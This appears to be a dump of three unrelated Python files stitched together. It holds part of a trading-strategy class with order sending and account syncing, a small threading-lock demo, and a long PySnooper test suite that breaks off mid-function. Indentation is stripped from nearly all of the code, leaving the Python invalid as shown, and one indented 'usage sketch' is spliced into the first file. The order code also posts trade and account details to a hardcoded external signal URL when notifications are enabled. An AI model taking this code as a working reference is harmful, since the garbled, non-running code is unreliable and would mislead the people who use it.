def send_order(self, direction='BUY', offset='OPEN', price=3925, volume=10, order_id='', code=None):
if code is None:
code = self.get_code()
towards = getattr(ORDER_DIRECTION, '{}_{}'.format(direction, offset))
order_id = str(uuid.uuid4()) if order_id == '' else order_id
if isinstance(price, float):
pass
elif isinstance(price, pd.Series):
price = price.values[0]
if self.running_mode == 'sim':
# intercept orders here that cannot be filled at the requested price
if (direction == 'BUY' and self.latest_price[code] <= price) or (direction == 'SELL' and self.latest_price[code] >= price):
QA.QA_util_log_info(
'============ {} SEND ORDER =================='.format(order_id))
QA.QA_util_log_info('direction{} offset {} price{} volume{}'.format(
direction, offset, price, volume))
if self.check_order(direction, offset, code=code):
#self.last_order_towards = {'BUY': '', 'SELL': ''}
self.last_order_towards[code][direction] = offset
now = str(datetime.datetime.now())
order = self.acc.send_order(
code=code, towards=towards, price=price, amount=volume, order_id=order_id)
print(order)
order['topic'] = 'send_order'
self.pub.pub(
json.dumps(order), routing_key=self.strategy_id)
self.acc.make_deal(order)
self.on_deal(order)
self.bar_order['{}_{}'.format(
direction, offset)] = self.bar_id
if self.send_wx:
for user in self.subscriber_list:
QA.QA_util_log_info(self.subscriber_list)
try:
requests.post('http://www.yutiansut.com/signal?user_id={}&template={}&strategy_id={}&realaccount={}&code={}&order_direction={}&order_offset={}&price={}&volume={}&order_time={}'.format(
user, "xiadan_report", self.strategy_id, self.acc.user_id, code.lower(), direction, offset, price, volume, now))
except Exception as e:
QA.QA_util_log_info(e)
else:
QA.QA_util_log_info('failed in ORDER_CHECK')
else:
self.on_ordererror(direction, offset, price, volume)
elif self.running_mode == 'backtest':
self.bar_order['{}_{}'.format(direction, offset)] = self.bar_id
if self.market_type == 'stock_cn':
order = self.acc.send_order(
code=code, amount=volume, time=self.running_time, towards=towards, price=price)
order.trade(order.order_id, order.price,
order.amount, order.datetime)
self.on_deal(order.to_dict())
else:
self.acc.receive_simpledeal(
code=code, trade_time=self.running_time, trade_towards=towards, trade_amount=volume, trade_price=price, order_id=order_id, realorder_id=order_id, trade_id=order_id)
self.on_deal({
'code': code,
'trade_time': self.running_time,
'trade_towards': towards,
'trade_amount': volume,
'trade_price': price,
'order_id': order_id,
'realorder_id': order_id,
'trade_id': order_id
})
self.positions = self.acc.get_position(code)
def update_account(self):
if self.running_mode == 'sim':
QA.QA_util_log_info('{} UPDATE ACCOUNT'.format(
str(datetime.datetime.now())))
self.accounts = self.acc.account_msg
self.orders = self.acc.orders
if isinstance(self.code, str):
self.positions = self.acc.get_position(self.code)
else:
pass
self.trades = self.acc.trades
self.updatetime = self.acc.dtstr
self.on_sync()
elif self.running_mode == 'backtest':
if isinstance(self.code, str):
self.positions = self.acc.get_position(self.code)
else:
pass
def get_exchange(self, code):
return self.market_preset.get_exchange(code)
def get_positions(self, code):
if self.running_mode == 'sim':
self.update_account()
return self.acc.get_position(code)
elif self.running_mode == 'backtest':
return self.acc.get_position(code)
def get_cash(self):
if self.running_mode == 'sim':
self.update_account()
return self.accounts.get('available', '')
elif self.running_mode == 'backtest':
return self.acc.cash_available
def run(self):
while True:
time.sleep(self.risk_check_gap)
self.risk_check()
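# --- Usage sketch (added for illustration; not part of the original module) ---
# QAStrategyCtaBase expects users to subclass it and implement on_bar() (and,
# optionally, on_tick()/on_1min_bar()). A deliberately simplified stub with
# made-up trading logic, just to show where orders are sent from:
class _ExampleStrategy(QAStrategyCtaBase):
    def on_bar(self, bar):
        # `bar` is a dict-like record with open/high/low/close/volume (see callback()).
        if self.positions.volume_long == 0 and bar['close'] > bar['open']:
            self.send_order(direction='BUY', offset='OPEN',
                            price=bar['close'], volume=1)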
if __name__ == '__main__':
QAStrategyCtaBase(code='rb2005').run()
|
lock_with.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# lock_with.py
#
# An example of using a lock with the Python 2.6 context-manager feature
import threading
X = 0 # A shared Value
COUNT = 1000000
# Primarily used to synchronize threads so that only one thread can make modifications to shared data at any given time.
X_Lock = threading.Lock() # A lock for synchronizing access to X
def addition():
global X
for i in range(COUNT):
with X_Lock: # This automatically acquires the lock and releases it when control enters/exits the associated block of statements
X += 1
def subtraction():
global X
for i in range(COUNT):
with X_Lock:
X -= 1
t1 = threading.Thread(target=subtraction)
t2 = threading.Thread(target=addition)
t1.start()
t2.start()
t1.join()
t2.join()
print(X)
"""
Only one thread can successfully acquire the lock at any given time.
If another thread tries to acquire the lock while it's already in use, it gets blocked until the lock is released.
"""
|
test_pysnooper.py
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
import io
import textwrap
import threading
import time
import types
import os
import sys
from pysnooper.utils import truncate
import pytest
import pysnooper
from pysnooper.variables import needs_parentheses
from .utils import (assert_output, assert_sample_output, VariableEntry,
CallEntry, LineEntry, ReturnEntry, OpcodeEntry,
ReturnValueEntry, ExceptionEntry, SourcePathEntry,
ElapsedTimeEntry)
from . import mini_toolbox
def test_string_io():
string_io = io.StringIO()
@pysnooper.snoop(string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
)
)
def test_relative_time():
snoop = pysnooper.snoop(relative_time=True)
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
time.sleep(0.1)
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry('x', '2'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# In with in recursive call
VariableEntry('x', '1'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# Call to bar1 from if block outside with
VariableEntry('_x', '0'),
VariableEntry('qux'),
CallEntry('def bar1(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(0.1),
# In with in recursive call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '1'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(0.1),
# In with in recursive call
LineEntry('qux()'),
ElapsedTimeEntry(0.4),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(0.1),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '2'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(0.1),
# In with in first call
LineEntry('qux()'),
ElapsedTimeEntry(0.7),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(0.1),
),
)
def test_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function('baba')
assert result == 15
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
)
)
def test_multi_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
def parse_call_content(line):
return line.split('{event:9} '.format(event='call'))[-1]
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
my_function('baba')
t1 = threading.Thread(target=my_function, name="test123", args=['bubu'])
t1.start()
t1.join()
t1 = threading.Thread(target=my_function, name="bibi", args=['bibi'])
t1.start()
t1.join()
output = output_capturer.string_io.getvalue()
calls = [line for line in output.split("\n") if "call" in line]
main_thread = calls[0]
assert parse_call_content(main_thread) == parse_call_content(calls[1])
assert parse_call_content(main_thread) == parse_call_content(calls[2])
thread_info_regex = '([0-9]+-{name}+[ ]+)'
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
VariableEntry('foo', value_regex="u?'bubu'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="test123")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="test123")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
VariableEntry('foo', value_regex="u?'bibi'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(name='bibi')),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(name='bibi')),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
)
)
@pytest.mark.parametrize("normalize", (True, False))
def test_callable(normalize):
string_io = io.StringIO()
def write(msg):
string_io.write(msg)
@pysnooper.snoop(write, normalize=normalize)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_watch(normalize):
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch=(
'foo.x',
'io.__name__',
'len(foo.__dict__["x"] * "abc")',
), normalize=normalize)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
VariableEntry('io.__name__', "'io'"),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
VariableEntry('foo.x', '2'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '6'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
VariableEntry('foo.x', '4'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '12'),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
VariableEntry('foo.x', '16'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '48'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_watch_explode(normalize):
class Foo:
def __init__(self, x, y):
self.x = x
self.y = y
@pysnooper.snoop(watch_explode=('_d', '_point', 'lst + []'), normalize=normalize)
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_point = Foo(x=3, y=4)
lst = [7, 8, 9]
lst.append(10)
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
VariableEntry("_d['c']", "'ignore'"),
LineEntry(),
VariableEntry('_point'),
VariableEntry('_point.x', '3'),
VariableEntry('_point.y', '4'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[0]', '7'),
VariableEntry('(lst + [])[1]', '8'),
VariableEntry('(lst + [])[2]', '9'),
VariableEntry('lst + []'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[3]', '10'),
VariableEntry('lst + []'),
ReturnEntry(),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_variables_classes(normalize):
class WithSlots(object):
__slots__ = ('x', 'y')
def __init__(self):
self.x = 3
self.y = 4
@pysnooper.snoop(watch=(
pysnooper.Keys('_d', exclude='c'),
pysnooper.Attrs('_d'), # doesn't have attributes
pysnooper.Attrs('_s'),
pysnooper.Indices('_lst')[-3:],
), normalize=normalize)
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_s = WithSlots()
_lst = list(range(1000))
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('WithSlots'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
LineEntry(),
VariableEntry('_s'),
VariableEntry('_s.x', '3'),
VariableEntry('_s.y', '4'),
LineEntry(),
VariableEntry('_lst'),
VariableEntry('_lst[997]', '997'),
VariableEntry('_lst[998]', '998'),
VariableEntry('_lst[999]', '999'),
ReturnEntry(),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_single_watch_no_comma(normalize):
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch='foo', normalize=normalize)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable(normalize):
@pysnooper.snoop(normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{100}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable_with_custom_max_variable_length(normalize):
@pysnooper.snoop(max_variable_length=200, normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{200}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable_with_infinite_max_variable_length(normalize):
@pysnooper.snoop(max_variable_length=None, normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{1000,100000}$)\[0, 1, 2, [^.]+ 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_repr_exception(normalize):
class Bad(object):
def __repr__(self):
1 / 0
@pysnooper.snoop(normalize=normalize)
def my_function():
bad = Bad()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Bad'),
CallEntry('def my_function():'),
LineEntry('bad = Bad()'),
VariableEntry('bad', value='REPR FAILED'),
ReturnEntry(),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_depth(normalize):
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
@pysnooper.snoop(string_io, depth=3, normalize=normalize)
def f1(x1):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f1(x1):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_method_and_prefix(normalize):
class Baz(object):
def __init__(self):
self.x = 2
@pysnooper.snoop(watch=('self.x',), prefix='ZZZ', normalize=normalize)
def square(self):
foo = 7
self.x **= 2
return self
baz = Baz()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = baz.square()
assert result is baz
assert result.x == 4
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(prefix='ZZZ'),
VariableEntry('self', prefix='ZZZ'),
VariableEntry('self.x', '2', prefix='ZZZ'),
CallEntry('def square(self):', prefix='ZZZ'),
LineEntry('foo = 7', prefix='ZZZ'),
VariableEntry('foo', '7', prefix='ZZZ'),
LineEntry('self.x **= 2', prefix='ZZZ'),
VariableEntry('self.x', '4', prefix='ZZZ'),
LineEntry(prefix='ZZZ'),
ReturnEntry(prefix='ZZZ'),
ReturnValueEntry(prefix='ZZZ'),
ElapsedTimeEntry(prefix='ZZZ'),
),
prefix='ZZZ',
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_file_output(normalize):
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
@pysnooper.snoop(path, normalize=normalize)
def my_function(_foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('_foo', value_regex="u?'baba'"),
CallEntry('def my_function(_foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_confusing_decorator_lines(normalize):
string_io = io.StringIO()
def empty_decorator(function):
return function
@empty_decorator
@pysnooper.snoop(string_io, normalize=normalize,
depth=2) # Multi-line decorator for extra confusion!
@empty_decorator
@empty_decorator
def my_function(foo):
x = lambda bar: 7
y = 8
return y + x(foo)
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
LineEntry(),
# inside lambda
VariableEntry('bar', value_regex="u?'baba'"),
CallEntry('x = lambda bar: 7'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
# back in my_function
ReturnEntry(),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_lambda(normalize):
string_io = io.StringIO()
my_function = pysnooper.snoop(string_io, normalize=normalize)(lambda x: x ** 2)
result = my_function(7)
assert result == 49
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '7'),
CallEntry(source_regex='^my_function = pysnooper.*'),
LineEntry(source_regex='^my_function = pysnooper.*'),
ReturnEntry(source_regex='^my_function = pysnooper.*'),
ReturnValueEntry('49'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
def test_unavailable_source():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder, \
mini_toolbox.TempSysPathAdder(str(folder)):
module_name = 'iaerojajsijf'
python_file_path = folder / ('%s.py' % (module_name,))
content = textwrap.dedent(u'''
import pysnooper
@pysnooper.snoop()
def f(x):
return x
''')
with python_file_path.open('w') as python_file:
python_file.write(content)
module = __import__(module_name)
python_file_path.unlink()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = getattr(module, 'f')(7)
assert result == 7
output = output_capturer.output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(stage='starting'),
CallEntry('SOURCE IS UNAVAILABLE'),
LineEntry('SOURCE IS UNAVAILABLE'),
ReturnEntry('SOURCE IS UNAVAILABLE'),
ReturnValueEntry('7'),
ElapsedTimeEntry(),
)
)
def test_no_overwrite_by_default():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path))
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert output.startswith('lala')
shortened_output = output[4:]
assert_output(
shortened_output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
)
)
def test_overwrite():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path), overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert 'lala' not in output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
)
)
def test_error_in_overwrite_argument():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
with pytest.raises(Exception, match='can only be used when writing'):
@pysnooper.snoop(overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
def test_needs_parentheses():
assert not needs_parentheses('x')
assert not needs_parentheses('x.y')
assert not needs_parentheses('x.y.z')
assert not needs_parentheses('x.y.z[0]')
assert not needs_parentheses('x.y.z[0]()')
assert not needs_parentheses('x.y.z[0]()(3, 4 * 5)')
assert not needs_parentheses('foo(x)')
assert not needs_parentheses('foo(x+y)')
assert not needs_parentheses('(x+y)')
assert not needs_parentheses('[x+1 for x in ()]')
assert needs_parentheses('x + y')
assert needs_parentheses('x * y')
assert needs_parentheses('x and y')
assert needs_parentheses('x if z else y')
@pytest.mark.parametrize("normalize", (True, False))
def test_with_block(normalize):
# Testing that a single Tracer can handle many mixed uses
snoop = pysnooper.snoop(normalize=normalize)
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry('x', '2'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# In with in recursive call
VariableEntry('x', '1'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# Call to bar1 from if block outside with
VariableEntry('_x', '0'),
VariableEntry('qux'),
CallEntry('def bar1(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# In with in recursive call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '1'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# In with in recursive call
LineEntry('qux()'),
ElapsedTimeEntry(),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '2'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# In with in first call
LineEntry('qux()'),
ElapsedTimeEntry(),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_with_block_depth(normalize):
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
def f1(x1):
str(3)
with pysnooper.snoop(string_io, depth=3, normalize=normalize):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(x1)'),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_cellvars(normalize):
string_io = io.StringIO()
def f2(a):
def f3(a):
x = 0
x += 1
def f4(a):
y = x
return 42
